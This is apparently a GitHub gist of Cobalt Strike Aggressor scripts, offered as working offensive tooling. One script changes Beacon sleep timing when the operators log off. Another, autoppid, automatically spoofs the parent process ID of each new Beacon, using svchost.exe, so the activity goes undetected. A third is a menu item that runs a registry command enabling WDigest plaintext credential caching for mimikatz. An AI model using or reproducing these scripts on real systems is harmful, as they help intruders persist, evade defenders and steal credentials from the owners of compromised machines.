#value to set all Beacons' sleep interval and jitter to when operators log off (specified in seconds)
$sleep_value = 300;
$jitter_value = 20;
on event_quit {
#NOTE: You will need to modify the below number higher if you use agscript to log in and run scripts.
if (size(users()) <= 2) {
foreach $beacon (beacons()) {
#ignore SMB Beacons
if ($beacon["pbid"] eq '') {
bsleep($beacon["id"], $sleep_value, $jitter_value);
}
}
}
}
#
# Autoppid - script that smartely invokes PPID for every new checkin in Beacon.
# PPID command requires invoked Beacon to have the same Integrity level as the process it want's
# to assume as it's Parent. That's due to how InitializeProcThreadAttributeList with
# PROC_THREAD_ATTRIBUTE_PARENT_PROCESS works. In order to avoid harcoded explorer.exe PID assumption,
# we can look around for a configurable process name and then try to find that process running
# on the highest available for us integrity level. In that case, unprivileged user would assume PPID
# of for instance svchost.exe running as that user, wherease the privileged one - could go for the
# svchost.exe running as NT AUTHORITY\SYSTEM. We aim to smartely pick the most advantageous target,
# in a dynamic fashion.
#
# The script also includes alias registration.
#
# Author: Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
#
# Set desirable process name which you want to become your parent. This process will be used for
# parent PID spoofing and thus should be allowed for opening for your current process token.
$PARENT_PROCESS_NAME = "svchost.exe";
beacon_command_register(
"autoppid",
"Automatically finds suitable PPID and sets it (target: $PARENT_PROCESS_NAME )",
"Automatically finds suitable - according to the current user context - PPID and sets it (target: $PARENT_PROCESS_NAME )");
sub findSuitableParentPID {
local('$_bid $_callback $_processName $_userName');
$_bid = $1;
$_callback = $2;
$_processName = $3;
$_userName = binfo($1, "user");
if (right($_userName, 2) eq ' *') {
$_userName = substr($_userName, 0, strlen($_userName) - 2);
}
bps($_bid, lambda({
local('$tab $entry $name $pid $ppid $arch $user');
foreach $entry (split("\n", $2)) {
($name, $ppid, $pid, $arch, $user) = split("\\s+", $entry);
# "NT AUTHORITY" contains space, thus breaking our split results. Here's a workaround for that
if($user eq "NT") {
$user = substr($entry, indexOf($entry, "NT "));
$tab = indexOf($user, "\t");
if ($tab) {
$user = substr($user, 0, $tab);
}
}
if (($pid) && ($name eq $processName)) {
if($user) {
if( ($userName isin $user) || ($user isin $userName) ) {
[$callback : $bid, $pid, "\t" . $entry];
break;
}
}
}
}
}, $bid => $_bid, $callback => $_callback, $userName => $_userName, $processName => $_processName));
}
alias autoppid {
local('$processName $userName $params');
$params = "";
if(strlen($0) > strlen("autoppid ")) {
$params = substr($0, strlen("autoppid "));
}
$processName = $PARENT_PROCESS_NAME;
$userName = binfo($1, "user");
if (right($userName, 2) eq ' *') {
$userName = substr($userName, 0, strlen($userName) - 2);
}
if($params ne "quiet") {
btask($1, "Tasked Beacon to find $processName running as $userName and make it the PPID.");
}
findSuitableParentPID($1, lambda({
if($params ne "quiet") {
blog!($1, "Future post-ex jobs will be spawned with fake PPID set to:\n$3");
bppid($1, $2);
} else {
bppid!($1, $2);
}
}, $params => $params), $processName);
}
on beacon_initial {
# Parent PID spoofing
fireAlias($1, "autoppid", "");
}
on beacon_error {
local('$ppid $err');
if ($2 ismatch 'Could not set PPID to (\d+): (\d+)' ) {
($ppid, $err) = matched();
if($err == 87) {
blog2($1, "Catched PPID error: \c4Previous parent process no longer exists\o. Finding a new one...");
fireAlias($1, "autoppid", "quiet");
}
else if($err == 5) {
blog2($1, "Catched PPID error:\c4 $err $+ \o. Access Denied. Don't know how to proceed. Reseting PPID to none.");
bppid($1, 0);
}
else {
blog2($1, "Catched PPID error:\c4 $err $+ \o. Will find another candidate for PPID spoofing.");
fireAlias($1, "autoppid", "quiet");
}
blog2($1, "\c8 Repeat your last command as it failed.\o");
}
}
#timwhite
popup beacon_top
{
menu "win 2012+[mimikatz]" {
item "edit reg" {
local('$bid');
foreach $bid ($1){
bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f");
}
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment